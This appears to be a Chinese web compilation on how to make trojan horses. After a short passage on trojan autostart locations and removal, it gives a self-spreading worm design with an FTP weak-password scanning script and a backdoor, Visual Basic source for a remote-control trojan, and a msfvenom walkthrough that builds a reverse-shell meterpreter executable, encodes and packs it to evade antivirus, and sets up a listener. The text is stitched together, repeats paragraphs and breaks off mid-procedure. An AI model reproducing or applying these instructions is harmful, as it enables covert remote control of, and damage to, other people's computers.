如何做木马_怎么造木马程序

木马的制作

概念：特洛伊木马(以下简称木马)，英文叫做“Trojan house”，其名称取自希腊神话的特洛伊木马记。

它是一种基于远程控制的黑客工具，具有隐蔽性和非授权性的特点。

所谓隐蔽性是指木马的设计者为了防止木马被发现，会采用多种手段隐藏木马，这样服务端即使发现感染了木马，由于不能确定其具体位置，往往只能望“马”兴叹。

所谓非授权性是指一旦控制端与服务端连接后，控制端将享有服务端的大部分操作权限，包括修改文件，修改注册表，控制鼠标，键盘等等，而这些权力并不是服务端赋予的，而是通过木马程序窃取的。

从木马的发展来看，基本上可以分为两个阶段。

最初网络还处于以UNIX平台为主的时期，木马就产生了，当时的木马程序的功能相对简单，往往是将一段程序嵌入到系统文件中，用跳转指令来执行一些木马的功能，在这个时期木马的设计者和使用者大都是些技术人员，必须具备相当的网络和编程知识。

而后随着WINDOWS平台的日益普及，一些基于图形操作的木马程序出现了，用户界面的改善，使使用者不用懂太多的专业知识就可以熟练的操作木马，相对的木马入侵事件也频繁出现，而且由于这个时期木马的功能已日趋完善，因此对服务端的破坏也更大了。

所以所木马发展到今天，已经无所不用其极，一旦被木马控制，你的电脑将毫无秘密可言。

原理：“木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装自己。

当然它也会悄无声息地启动，你当然不会指望用户每次启动后点击“木马”图标来运行服务端，，“木马”会在每次用户启动时自动装载服务端，Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、win.ini、system.ini、注册表等等都是“木马”藏身的好地方。下面具体谈谈“木马”是怎样自动加载的。

在win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。一般情况下，它们的等号后面什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中上“木马”了。当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe文件，如果不注意可能不会发现它不是真正的系统启动文件。

在system.ini文件中，在[BOOT]下面有个“shell=文件名”。正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe 程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

在注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至：“HKEY－LOCAL－MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE。

这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY－LOCAL－MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run”下的Explorer 键值改为Explorer=“C:/WINDOWS/expiorer.exe”，“木马”程序与真正的Explorer之间只有“i”与“l”的差别。

当然在注册表中还有很多地方都可以隐藏“木马”程序，如：“HKEY－CURRENT－USER/Software/Microsoft/Windows/CurrentVersion/Run”、“HKEY－USERS/＊＊＊＊/Software/Microsoft/Windows/CurrentVersion/Run”的目录下都有可能，最好的办法就是在“HKEY－LOCAL－MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”下找到“木马”程序的文件名，再在整个注册表中搜索即可。

知道了“木马”的工作原理，查杀“木马”就变得很容易，如果发现有“木马”存在，最安全也是最有效的方法就是马上将计算机与网络断开，防止黑客通过网络对你进行攻击。

然后编辑win.ini文件，将[WINDOWS]下面，“run=“木马”程序”或“load=“木马”程序”更改为“run=”和“load=”；编辑system.ini文件，将[BOOT]下面的“shell=‘木马’文件”，更改为：“shell=explorer.exe”；在注册表中，用regedit对注册表进行编辑，先在“HKEY－LOCAL－MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”下找到“木马”程序的文件名，再在整个注册表中搜索并替换掉“木马”程序。

有时候还需注意的是：有的“木马”程序并不是直接将“HKEY－LOCAL－MACHINE/Software/Microsoft/Windows/CurrentVersion/Run”下的“木马”键值删除就行了，因为有的“木马”如：BladeRunner“木马”，如果你删除它，“木马”会立即自动加上，你需要的是记下“木马”的名字与目录，然后退回到MS－DOS下，找到此“木马”文件并删除掉。

重新启动计算机，然后再到注册表中将所有“木马”文件的键值删除。至此，我们就大功告成了。

木马一词的来源：

“木马”原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上，“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中，包含了可以控制用户的计算机系统的程序，可能造成用户的系统被破坏甚至瘫痪

木马程序是怎么编出来的？

一个典型的蠕虫病毒有两个功能型部件：传播和破坏，流行的蠕虫病毒大都是利用操作系统或者应用程序的漏洞（以弱口令和溢出最为常见），但常常并不会对宿主机造成“致命”的破坏。这两个特点使蠕虫病毒比普通电脑病毒传播得更快，影响力更大。一般来说，单一的蠕虫病毒只针对某种特定的漏洞进行攻击，所以一旦这种漏洞得到大范围修补，病毒也就没有了生存空间。

更新这种设计，我把传播部件拆分开来：把扫描、攻击和破坏脚本化，主程序则负责解析这些脚本。例如针对ftp弱口令进行扫描，我们可以定义如下脚本：

code:

uid = iscript-0a21-2331-x #随机唯一编号

using tcp;

port 21;

send “user anonymous”;

send crlf;

send “pass fake@nothing.com”

send crlf;

if (find “200”) resulrt ok;

next;

[copy to clipboard]

解析了这段脚本后（我想这种脚本是很容易读懂的），我们再定义一系列的过程，把我们的蠕虫体upload上去，一次完整的传播动作就完成了。如果是溢出漏洞，为了简单起见我们可以采集远程溢出的数据包，然后修改ip地址等必要数据，再转发溢出数据包进行溢出（这种情况下要实现connect-back就不容易了，不过这些具体问题就待有心人去研究吧），例如：

code:

using raw;

ip offset at 12;

send “\x1a\xb2\xcc” ……

[copy to clipboard]d

主程序在完成传播后留下一个后门，其他宿主机可以通过这个后门与本地的蠕虫病毒同步传播脚本，这样每次有新的漏洞产生，宿主机的传播方式可以很快地得到升级。我们当然不会仅满足于这样一个蠕虫程序，扫描/攻击脚本的传播过程也是需要仔细处理的。

我们希望适应力（fitness）最强的脚本得到广泛的应用（看起来有点类似 蚁群算法 和 ga），所以我们要求得每个个体的fitness，当它和另一个体取得联系的时候就可以决定谁的传播脚本将取代另一个：

fitness = number of host infected / number of host scanned

但也不能仅凭fitness就修改传播脚本，我个人觉得一个合适的概率是75%，20%的机会保持各自的传播脚本，剩下的5%则交换脚本。这样在维持每种脚本都有一定生存空间的情况下使适应性最好的个体得到更多的传播机会，同时，一些在某种网络环境下适应性不强的脚本也有机会尝试不同的网络环境。

怎么编写木马

这个只是恶作剧程序，不是木马。

其实很简单嘛，只要终止explorer.exe进程就行了。

这都不需要编程，只要写个批处理就行。

把：taskkill

/f

/im

Explorer.exe写到一个文本文档里，然后把那个文档的后缀名由.txt改为.bat就行了。

木马怎么做 （举例）

使用VB建立两个程序，一个为客户端程序Client，一个为服务器端程序systry。

在Client工程中建立一个窗体，加载WinSock控件，称为tcpClient，协议选择TCP，再加入两个文本框，用以输入服务器的IP地址或服务器名，然后建立一个按钮，按下之后就可以对连接进行初始化了，代码如下：

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("请输入主机名或主机IP地址。")

Exit Sub

Else

If Len(Text1.Text) 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

连接建立之后就可以使用DataArrival事件处理所收到的数据了。

在服务器端systry工程也建立一个窗体，加载WinSock控件，称为tcpServer，协议选择TCP，在Form_Load事件中加入如下代码：

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准备应答客户端程序的请求连接，使用ConnectionRequest事件来应答户端程序的请求，代码如下：

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State sckClosed Then

tcpServer.Close‘检查控件的 State 属性是否为关闭的。

End If ’如果不是，在接受新的连接之前先关闭此连接。

tcpServer.Accept requestID

End Sub

这样在客户端程序按下了连接按钮后，服务器端程序的ConnectionRequest事件被触发，执行了以上的代码。如果不出意外，连接就被建立起来了。

2. 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如：把服务器端的驱动器名、目录名、文件名等传到客户机端，客户机端接收后用TreeView控件以树状的形式显示出来，浏览服务器端文件目录；强制关闭或重启服务器端的计算机；屏蔽任务栏窗口；屏蔽开始菜单；按照客户机端传过来的文件名或目录名，而删除它；屏蔽热启动键；运行服务器端的任何程序；还包括获取目标计算机屏幕图象、窗口及进程列表；激活、终止远端进程；打开、关闭、移动远端窗口；控制目标计算机鼠标的移动与动作；交换远端鼠标的左右键；在目标计算机模拟键盘输入，下载、上装文件；提取、创建、修改目标计算机系统注册表关键字；在远端屏幕上显示消息。DataArrival事件程序如下：

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

‘接收数据并存入strData

For i = 1 To Len(strData)

‘分离strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

‘把命令ID号存入mKey

‘把命令参数存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

‘驱动器名、目录名、文件名

Case 2

强制关闭服务器端的计算机

Case 3

强制重启服务器端的计算机

Case 4

屏蔽任务栏窗口；

Case 5

屏蔽开始菜单；

Case 6

按照客户机端传过来的文件名或目录名，而删除它；

Case 7

屏蔽热启动键；

Case 8

运行服务器端的任何程序

End Select

End Sub

详细程序略。

客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数，它们用符号“@”隔开。

另外，当客户机端断开与服务器端的来接后，服务器端应用tcpServer_Close事件，来继续准备接收客户机端的请求，其代码如下：

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中方法，是修改系统注册表的方法。

这就是一个最基本的特洛伊木马程序，只要你的机器运行了服务器端程序，那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了，在我的源程序中有一中方法，是修改系统注册表的方法。

成功的特洛伊木马程序要比这个复杂一些，还有程序的隐藏、自动复制、传播等问题要解决。警告：千万不要用BO程序破坏别人的系统。

如何用msfvenom生成木马程序

一,目的:熟悉msfvenom生成木马程序过程,并执行和监听控制.

二,工具:MSF

三,原理:msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

四,过程:

1,查看帮助

命令: root# msfvenom -h

结果:

2,生成meterpreter payload 并利用shikata_ga_nai编码,查看所需选项,利用 -o参数

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -o

结果:

3,现在设置LHOST,即监听主机IP和LPORT监听端口,我是本地局域网测试,所以IP是192.168.1.113,端口设置成443.所以最后连接会通向192.168.1.113的443端口

命令: root# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.1.113 LPORT=443 -f exe abc.exe

注:如果只是用msfpayload生成,简单示例:

命令: root # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.113 X Desktop/abc.exe

多次生成可进行免杀:msfpayload windows/shell_reverse_tcp lhost=192.168.128.129 lport=888 r| msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 3 -t raw | msfencode -e x86/shikata_ga_nai -c 6 -t raw | msfencode -e x86/alpha_upper -c 3 -t exe -o /root/Desktop/acn.exe

upx加壳：upx -5 /root/Desktop/acn.exe

结果:

说明: -p payload

-e 编码方式

-i 编码次数

-b 在生成的程序中避免出现的值

LHOST,LPORT 监听上线的主机IP和端口

-f exe 生成EXE格式

4,把生成的abc.exe放到win7下.执行.

5,在命令行下,打开msfconsole.

命令: root # msfconsole

6,本机监听,因为之前用的是reverse_tcp,所以设置如下

命令: msf use exploit/multi/handler

Msf exploit(handler) set payload windows/meterpreter/reverset_tcp

结果:

7,现在快完成了,设置LHOST,LPORT,并执行exploit,会发现有连接进来.

8,.验证